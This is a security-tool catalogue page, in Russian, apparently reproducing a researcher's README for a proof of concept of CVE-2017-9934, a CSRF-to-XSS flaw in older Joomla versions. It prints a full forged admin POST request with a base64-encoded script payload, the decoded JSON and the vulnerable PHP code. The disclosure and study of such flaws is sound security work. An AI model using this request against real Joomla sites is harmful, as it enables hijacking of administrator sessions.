Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-9934 — Joomla 1.7.3 - 3.7.2 CSRF exploit PoC | Kitploit
Инструменты/GitHubGitHub/xyringe/cve-2017-9934
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubxyringe/cve-2017-9934

CVE-2017-9934

Joomla 1.7.3 - 3.7.2 CSRF exploit PoC

Репозиторий
8 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-9934 (Я сообщил об этой уязвимости под именем: Envo)

Joomla 1.7.3 - 3.7.2 CSRF эксплойт PoC

Эта уязвимость возникает из-за того, что Joomla версий с 1.7.3 по 3.7.2 не санитизирует base64-ввод.

#Заголовки:

root@kitploit:~
POST http://localhost/joomla/administrator/index.php?option=com_menus&view=item&client_id=0&layout=edit&id=0 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 566
Cookie: 3139abcd402999f=ta0bmfak9faak44p4; joomla_user_state=logged_in; 8c7ff64bf1d0e216ccd4dd8c1e9745a3=4ebun9a72bolept9769d1tghu5; f8e2a3a5e2367dd628addf598dc92792=mc5g9gc7khdsa15jhijjaifrh1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: localhost

jform%5Bparams%5D%5Bmenu_show%5D=1&jform%5Bparams%5D%5Bmenu_text%5D=1&jform%5Bparams%5D%5Bsecure%5D=0&jform%5Btype%5D=eyJpZCI6MCwidGl0bGUiOiJjb21wb25lbnQiLCJyZXF1ZXN0Ijp7Im9wdGlvbiI6ImNvbV9mb288c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4ifX0%3D&jform%5Btemplate_style_id%5D=0&jform%5BbrowserNav%5D=0&jform%5Bid%5D=0&jform%5Bmenutype%5D=mainmenu&jform%5Bparent_id%5D=1&jform%5Bpublished%5D=1&jform%5Bhome%5D=0&jform%5Baccess%5D=1&jform%5Blanguage%5D=*&jform%5Btoggle_modules_assigned%5D=1&jform%5Btoggle_modules_published%5D=1&task=item.setType&fieldtype=type

Параметр 'task' в приведённом выше запросе вызывает функцию контроллера setType() в /administrator/components/com_menus/controllers/item.php, которая не требует CSRF-токена. Эта функция принимает base64-ввод в другом параметре ('jform[type]') и декодирует его в JSON-данные без санитизации. Если сформировать JSON следующим образом:

#Base64:

root@kitploit:~
eyJpZCI6MCwidGl0bGUiOiJjb21wb25lbnQiLCJyZXF1ZXN0Ijp7Im9wdGlvbiI6ImNvbV9mb288c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4ifX0=

#JSON:

root@kitploit:~
{"id":0,"title":"component","request":{"option":"com_foo<script>alert(document.cookie)</script>"}}

Мы можем вызвать ошибку в функции load() в /libraries/cms/component/helper.php. Переменная $option содержит нашу полезную нагрузку, которая выводится на экран без санитизации, что приводит к XSS:

root@kitploit:~

if (JFactory::$language)
{
    $msg = JText::sprintf('JLIB_APPLICATION_ERROR_COMPONENT_NOT_LOADING', $option, JText::_('JLIB_APPLICATION_ERROR_COMPONENT_NOT_FOUND'));
}
else
{
    $msg = sprintf('Error loading component: %1$s, %2$s', $option, 'Component not found.');
}

Отображение:

Предупреждение

Ошибка загрузки компонента: com_foo, Компонент не найден.

HTML-страница PoC прилагается в этом репозитории.

Скачать инструмент